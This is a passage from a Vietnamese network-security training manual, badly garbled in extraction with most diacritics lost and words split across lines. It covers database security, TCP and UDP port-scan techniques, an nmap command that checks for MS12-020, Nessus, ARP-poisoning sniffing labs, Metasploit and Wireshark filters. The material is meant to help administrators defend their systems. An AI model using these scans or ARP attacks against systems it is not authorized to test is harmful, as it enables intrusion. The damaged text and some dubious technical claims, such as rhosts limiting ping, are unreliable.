Trong mi loi database d ln hay nh, nu ch s dng tracking Update action, y l mt
cch tip cn tt nht. Vi Delete, hy customize li m s dng ti thiu trng cn phi
tracking hoc c th p dng phng php logging th 2 da trn on m ny.
6, 2012
mt
chc
bo
mt
mng
hiu
qu
rng
6, 2012
Cc
dch
v
bo
mt
(Server
Security)
Cc
kt
ni
c
s
d
liu
(Database
Connection)
iu
khin
truy
cp
bng
(Table
Access
Control)
Gii
hn
truy
cp
c
s
d
liu
(Restricting
Database
Access)
Cc dch v bo mt (Server Security)
Server Security l chng trnh t gii hn quyn truy cp thc vo dch v c s d liu. y l
kha cnh quan trng nht ca bo mt, bn nn lp k hoch cn thn cho n.
tng c bn ca n l: Bn khng th truy cp vo ci m bn khng th thy. y khng
phi l mt web server v cng khng nn l mt kt ni nc danh. Khi cn cung cp thng tin cho
web ng, c s d liu ca bn khng nn t cng mt my vi web server. iu khng ch
v mc ch bo mt m cn tt cho c qu trnh thc thi. Nu c s d liu l p ng cho web
server, nn cu hnh ch cho php kt ni vi web server .
6, 2012
ngun SQL, mt ngi dng thng thng khng bao gi c nhp d liu vo nu d liu
cha tng c xem xt.
Nu cn s dng kt ni ODBC, hy m bo rng ch c mt s ngi dng c quyn truy cp
file chia s. C bao gi mi nhn vin trong cng ty ca bn c quyn c tt c cha kho ca
mi phng cng ty? V th ng bao gi cho php cc ti khon ngi dng s dng mi kt ni
v ngun d liu trn server.
iu khin truy cp bng (Table Access Control)
iu khin truy cp bng l mt trong cc dng thc hay b b st nht bo mt c s d liu. V
rt kh k tha v p dng n. S dng mt cch thch hp iu khin truy cp bng i hi phi
c s hp tc ca c qun tr vin h thng v ngi pht trin c s d liu. V tt c chng ta
u bit rng hp tc l mt t l trong cng nghip IT.
Nhiu ngi dng s quy ti c quyn truy cp l do ngi qun tr h thng c s d liu
mc public. Hoc nu bng ch c s dng cho mc h thng th ti sao n li c cc quyn truy
cp khc bn cnh quyn admin.
ng tic l cu trc bng, c s d liu quan h ph hp v vn pht trin khng nm trong
phm vi ca bi ny. C th chng ta s bn k hn trong bi sau.
Gii hn truy cp c s d liu (Restricting Database Access)
y l mc cui cng trong bi tng quan v bo mt c s d liu chng ta ang xem xt. Vn
ch yu trong mc ny l truy cp mng h thng, trong tp trung v c s d liu internet. Hu
ht ch nhm ca cc cuc tn cng hin nay u l database c s mng, tt c ng dng s
dng web u c cng cho cc k tn cng nghe ngng.
Ti phm mng by gi thng ch yu s dng hnh thc n gin port scan (qut cng)
tm cc cng m t mc nh cho h thng c s d liu ph bin. Ni l mc nh v bn c th
thay i cc cng thnh dch v nghe, l mt cch hay trnh cc cuc tn cng.
u tin chng s c gng d xem liu mt my c a ch c th no khng. Chng s dng cu
lnh ping, n gin bng cch m ca s lnh command v g t kho pingvo, chng hn:
C:\ ping 127.0.0.1
hay
root@localhost: ~$: ping 127.0.0.1
Phn tr li c th dng:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Page | 210 Copyright by Tocbatdat
6, 2012
Ti phm mng ngy nay bit rt r v cu tr li ca h thng cc i ch ny. Bin php ngn
chn u tin l v hiu ho cc gi ICMP. N cng c th ngn chn phn tr li t yu cu ping.
C nhiu cch ngn chn truy cp m Internet. Mi h thng c s d liu u c mt tp thnh
phn ring duy nht cng nh h iu hnh. y ch xin a ra mt vi phng thc:
a ch IP tin cy: cc dch v UNIX c cu hnh tr li ch cc lnh ping trong danh sch
host tin cy. Trong UNIX, thc hin hon chnh vic ny bng cch cu hnh file rhosts, gii hn
truy cp server trong danh sch ngi dng c th.
V hiu ho ti khon server: Nu bn ang tm ngng mt server ID sau 3 ln sai mt khu, bn
tm hon c cuc tn cng. Nu khng th k tn cng c th chy chng trnh pht sinh
hng triu mt khu cho ti khi no n on ng ID v mt khu thch hp ca ngi dng mi
thi.
Cc chc nng c bit: bn c th s dng mt s sn phm nh RealSecure by ISS. N s gi
mt cnh bo khi c dch v bn ngoi ang c gng xm phm bo mt h thng ca bn.
C s d liu Oracle c rt nhiu phng thc kim nh:
Bo mt Kerberos: y l chic v ph bin, gip trnh phi s dng h thng thm nh c s.
C s d liu ring o (VPD): Cng ngh VPD c th gii hn quyn truy cp bng cch chn mt
s hng ca ct.
Bo mt grant-execute (cp pht thc thi): c quyn thc thi chng trnh con c th c kt
hp cht ch i vi ngi dng. Khi ngi dng thc thi chng trnh con, h c cp pht
quyn truy cp c s d liu, nhng ch nm trong phm vi chng trnh con.
Cc dch v thm nh: Cc dch v thm nh bo mt cung cp nhn dng xc nh trc ngi
dng ngoi.
Bo mt truy cp cng: Tt c ng dng Oracle u c nghe trc tip ti mt cng c th trn
server. Ging nh bt k dch v HTTP chun khc, Oracle Web Listener c th c cu hnh
gii hn quyn truy cp.
VI.
6, 2012
6, 2012
6, 2012
+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v Client c
thc hin.
b. Nguyn tc Scan Port trn mt h thng.
b. 1. TCP Scan
Trn gi TCP/UDP c 16 bit dnh cho Port Number iu c ngha n c t 1 65535 port.
Khng mt hacker no li scan ton b cc port trn h thng, chng ch scan nhng port hay s
dng nht thng ch s dng scan t port 1 ti port 1024 m thi.
Phn trn ca bi vit ti trnh by vi cc bn nguyn tc to kt ni v ngt kt ni gia hai
my tnh trn mng. Da vo cc nguyn tc truyn thng tin ca TCP ti c th Scan Port no m
trn h thng bng nhng phng thc sau y:
- SYN Scan: Khi Client bn gi SYN vi mt thng s Port nht nh ti Server nu server gi v
gi SYN/ACK th Client bit Port trn Server c m. Nu Server gi v cho Client gi
RST/SYN ti bit port trn Server ng.
- FIN Scan: Khi Client cha c kt ni ti Server nhng vn to ra gi FIN vi s port nht nh
gi ti Server cn Scan. Nu Server gi v gi ACK th Client bit Server m port , nu Server
gi v gi RST th Client bit Server ng port .
- NULL Scan Sure: Client s gi ti Server nhng gi TCP vi s port cn Scan m khng cha
thng s Flag no, nu Server gi li gi RST th ti bit port trn Server b ng.
- XMAS Scan Sorry: Client s gi nhng gi TCP vi s Port nht nh cn Scan cha nhiu
thng s Flag nh: FIN, URG, PSH. Nu Server tr v gi RST ti bit port trn Server b
ng.
- TCP Connect: Phng thc ny rt thc t n gi n Server nhng gi tin yu cu kt ni thc
t ti cc port c th trn server. Nu server tr v gi SYN/ACK th Client bit port m, nu
Server gi v gi RST/ACK Client bit port trn Server b ng.
- ACK Scan: dng Scan ny nhm mc ch tm nhng Access Controll List trn Server. Client c
gng kt ni ti Server bng gi ICMP nu nhn c gi tin l Host Unreachable th client s
hiu port trn server b lc.
C vi dng Scan cho cc dch v in hnh d b tn cng nh:
Page | 214 Copyright by Tocbatdat
6, 2012
- RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng.
- Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt s port nht
nh.
- FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay khng
- IDLE y l dng Passive Scan, sniffer v a ra kt lun my tnh m port no. Phng thc
ny chnh xc nhng i khi khng y bi c nhng port trn my tnh m nhng khng c
giao tip th phng thc ny cng khng scan c
b.2. UDP Scan.
Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c truyn ti ch.
Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu nhanh vi cc gi tin nh. Vi qu
trnh thc hin truyn tin bng TCP k tn cng d dng Scan c h thng ang m nhng port
no da trn cc thng s Flag trn gi TCP.
Cu to gi UDP
Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng cc phng thc
Scan port ca TCP s dng cho UDP c. Tht khng may hu ht h thng u cho php gi
ICMP.
Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi mt gi ICMP
type 3 code 3 port vi ni dung l unreachable v Client. Khi thc hin UDP Scan bn hy
chun b tinh thn nhn c cc kt qu khng c tin cy cao.
6, 2012
6, 2012
6, 2012
6, 2012
Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh dng file
khc nhau.
2. Scan l hng bo mt trn OS
a. S dng Nmap Scan l hng bo mt ca OS
Nmap c s dng tp Signature scan l hng bo mt l Nmap Script Engine. Mi file
Nmap Script Engine (.nse) s scan c mt loi l hng bo mt.
Di y ti trnh by cch Scan l hng bo mt MS12-020, l hng cho php tn cng
DoS lm treo h thng my tnh Windows 7, 2008, Vista, XP, 2003.
Step 1: access Google search query "search ms12-020 by nmap"
Step 2: download file Nmap Script Engine (.nse)
step 3: Install nmap 6
step 4: Scan s dng nmap vi cu lnh (File nse trong E th mc tocbatdat).
nmap -sC -p 3389 -v -v --script-trace --script "E:\\tocbatdat\\ms12-020-rev.nse" IP_Scan
Step 5: Khi Nmap bo nh sau th c l hng bo mt
(My tnh a ch IP 192.168.0.77 c l hng bo mt MS12-020)
6, 2012
Ci t:
6, 2012
6, 2012
6, 2012
Nhn Next tip tc, nu cha c Activation Code th nhn vo phn register:
6, 2012
6, 2012
6, 2012
Scan trc tin chng ta cu hnh thit lp Policy cho qu trnh Scan Nhn vo tab
Policy. Mc nh h thng c sn mt s Policy nh Web App Test, PCI.
Nhn Policy Internal Network Scan chn Edit, chng ta cu hnh la chn scan my ch
Windows Server. Thit lp cc thng s Scan.
6, 2012
Sau khi thit lp Policy hon tt sang Tab Scan add host cn Scan vo:
Chn Lauch Scan
Kt qu sau khi Scan hon tt: h thng s a ra Report v s lng l hng bo mt,
Open Port, OS, Service, tn l hng bo mt v hng gii quyt.
6, 2012
6, 2012
6, 2012
6, 2012
L hng trn OS
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
c. Mi trng Hub
Hub l mt Collision Domain nn vic capture traffic trn mng l hon ton d dng. i
vi nhng giao tip khng m ha th d dng c c thng tin.
d. K thut Sniffer trong mi trng Switch
Switch s dng MAC Address Table forward gi tin ti cc port c th.
NE-SW1#show mac address-table
Mac Address Table
------------------------------------------Vlan Mac Address
Type
---- ------------------ ----All 0100.0ccc.cccc STATIC
All 0100.0ccc.cccd STATIC
All 0180.c200.0000 STATIC
All 0180.c200.0001 STATIC
All 0180.c200.0002 STATIC
All 0180.c200.0003 STATIC
All 0180.c200.0004 STATIC
All 0180.c200.0005 STATIC
All 0180.c200.0006 STATIC
All 0180.c200.0007 STATIC
All 0180.c200.0008 STATIC
All 0180.c200.0009 STATIC
All 0180.c200.000a STATIC
All 0180.c200.000b STATIC
All 0180.c200.000c STATIC
All 0180.c200.000d STATIC
All 0180.c200.000e STATIC
All 0180.c200.000f STATIC
All 0180.c200.0010 STATIC
Ports
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
Cho nn khi mt my mun Sniffer trong mi trng Switch cn phi thc hin:
-
Sniffer chnh thng: Cu hnhPort Monitor trn Switch, mun gim st port no hay
VLAN no th lung traffic vo port .
MAC Spoofing: lm ngp bng MAC Address Table trn Switch (phng n ny
tng i kh.
6, 2012
6, 2012
6, 2012
Nhn Start tn cng Arp, sau khi thc hin tn cng ARP ton b traffic t my tnh
b tn cng v gateway u i qua my tnh ny.
e. M hnh Sniffer s dng cng c h tr ARP Attack
Switch
VM1
VM2 ci t cc
cng c Sniffer:
Wireshark,
Cain, Colasoft
Router
6, 2012
M hnh tn cng gm 2 my o:
My o VM1 ci t cng c Switchsniffer thc hin vic tn cng ARP ton b
traffic ca my b tn cng i qua my VM1 mi ra c mng.
My o VM2 do cng hub Bridge vi VM1 nn gi tin no i vo VM1 th VM2 cng
nhn c, trn my o VM2 ny ci t cc cng c Sniffer nh: Colasoft, Wireshark,
Cain & Abel.. capture traffice trn mng.
5. Cng c khai thc l hng Metasploit
a. Gii thiu tng quan v cng c Metasploit
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
c. Kt lun
Metasploit framwork l mt cng c hiu qu thc hin qu trnh kim tra an ninh mng
cho h thng. Metasploit Framwork h tr cng c Scan, Exploit v a ra cc report v cc l
hng .
6. S dng Wireshark v Colasoft phn tch gi tin
Sau khi xy dng c m hnh Sniffer nh trn thc hin ci t cc cng c Sniffer
trn my tnh VM2 thc hin vic Capture
d. S dng Wireshark phn tch gi tin v traffic ca h thng mng
Ci t Wireshark
Sau khi ci t chy Wireshark cho php Capture Filter (ch la chn nhng IP, phin
kt ni, Port dch v) capture. Hoc sau khi Capture Wireshark cho php lc ly
nhng thng tin cn thit.
Wireshark thc hin capture nhng thng tin cn thit
Page | 248 Copyright by Tocbatdat
6, 2012
La chn card mng thc hin Capture, thit lp Capture Filter capture nhng g cn
thit
6, 2012
src host IP
port
port 53
tcp port 80
tcp portrange 1-500
dst port 80 or dst port 443
(host 192.168.0.1 and host 192.168.0.50) and (port 80 or 443)
Sau khi Caputer chng ta c th Filter ly nhng thng tin cn thit
6, 2012
ip.addr==IP
to
ip.dst==IP
from
ip.src==IP
except
ip.addr!=IP
port
tcp.port eq 80 or tcp.port eq 443
(ip.addr==IP1 and ip.addr==IP2) and (tcp.port eq 80 or tcp.port eq 443)
Thit lp View c mt Session (TCP Stream)
6, 2012
6, 2012
Colasoft c cc tnh nng ph tr cho kh nng Sniffer, sau khi ci t cho php thc
hin capture:
La chn mt hoc nhiu card mng Capture
Bng thng mng hin nay trn card mng Capture
Nhn Start
6, 2012
6, 2012
6, 2012
Tng hp cc Session
6, 2012
6, 2012
6, 2012
Colasoft cng cho php lc thng tin chi tit hn Wireshark, cng cc tnh nng khc
Colasoft ch thc l mt cng c phn tch traffic mng cc mnh, v c th s dng
trong m hnh mng thc t Troubleshooting s c mng.
VII.
KT LUN
Ti liu ny cung cp cho ngi c t khi nim c bn nht v bo mt v an ton thng
tin cng nh cc kin thc chuyn su. T nhng kin thc ny ngi c c ci nhn
tng quan v cc gii php xy dng mt h thng mng an ton. K nng s dng cc
cng c Scan v Exploit gip ngi qun tr c kh nng pht hin cc nguy c h thng
trc khi hacker c th tm thy.